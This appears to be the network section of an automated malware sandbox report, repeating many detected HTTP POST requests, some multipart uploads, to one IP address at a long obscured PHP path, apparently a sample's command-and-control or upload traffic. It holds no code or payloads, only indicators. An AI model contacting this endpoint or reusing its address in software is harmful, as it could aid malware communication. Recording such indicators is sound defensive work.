Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: multipart/form-data; boundary=----59MfY50AqipQJA2NSEL4L76aSsDxNAY7bwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 95674Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2520Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1400Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1412Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1412Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2520Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2520Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1400Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1400Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1412Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2520Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1388Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1400Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2520Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 1412Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 37.230.113.179Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
